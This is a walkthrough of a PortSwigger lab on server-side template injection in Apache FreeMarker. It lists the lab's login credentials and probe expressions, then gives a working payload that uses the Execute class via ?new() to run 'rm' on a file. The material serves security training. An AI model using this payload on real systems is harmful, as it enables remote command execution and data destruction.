[This lab](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation) illustrates a realistic **black-box SSTI discovery scenario** where the vulnerability isn’t directly named. Instead, you’re encouraged to explore the template syntax, use documentation, and reason through an exploit path — just like a real-world pentest.
The lab uses **Apache FreeMarker**, a Java-based template engine commonly used in CMS and e-commerce systems. Through manual testing and reference to the official documentation, we escalate from basic expression rendering to full **arbitrary code execution via object instantiation**.
---
##### Step-by-Step Exploitation
###### 1. Log in and Find Editable Template
Log in using:
```
Username: content-manager
Password: C0nt3ntM4n4g3r
```
- Navigate to the admin panel or product editor
- Edit one of the product description **templates**
###### 2. Probe for Template Syntax
Insert a test expression:
```
${7*7}
```
Or cause a reference error:
```
${doesnotexist}
```
You’ll see either:
- **Rendered result** (e.g. `49`)
- **A template error mentioning FreeMarker**
This confirms the use of **FreeMarker** and that **user-controlled expressions are parsed server-side**.
![[CleanShot 2025-05-05 at 13.27.34.png]]
---
##### 3. Identify Exploitation Path from Docs
From the [FreeMarker documentation](https://freemarker.apache.org/docs/index.html):
- Go to the **"Built-ins reference"**
- Find `?new` (object instantiation built-in)
- Docs say it's **dangerous** and should be disabled in production
- It allows instantiating **any Java class** that implements `TemplateModel`
From the [JavaDoc for TemplateModel](https://freemarker.apache.org/docs/api/freemarker/template/TemplateModel.html):
- Under “**All Known Implementing Classes**”
- Find: `freemarker.template.utility.Execute`
This utility allows executing system commands.
---
##### 4. Construct Payload Using `Execute`
FreeMarker payload format:
```freemarker
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("COMMAND") }
```
Replace `COMMAND` with the file deletion command:
```freemarker
rm /home/carlos/morale.txt
```
Full payload:
```
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }
```
---
##### 5. Replace Template and Trigger
- Remove any broken test syntax
- Paste in your exploit payload
- Save the template
- Visit the product page to render the template
**If successful**, the `rm` command is executed and the lab is marked **Solved**.
---
##### Why it works?
- FreeMarker allows dynamic object creation with `?new()` when misconfigured
- `freemarker.template.utility.Execute` provides a direct method to invoke shell commands
- The vulnerability exists because user input is trusted inside a **parsed template file**
---
##### Payload Recap
```freemarker
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }
```
- `<#assign>`: assigns a variable
- `?new()`: instantiates the Java class
- `${ ex("...") }`: invokes the `Execute` object with a shell command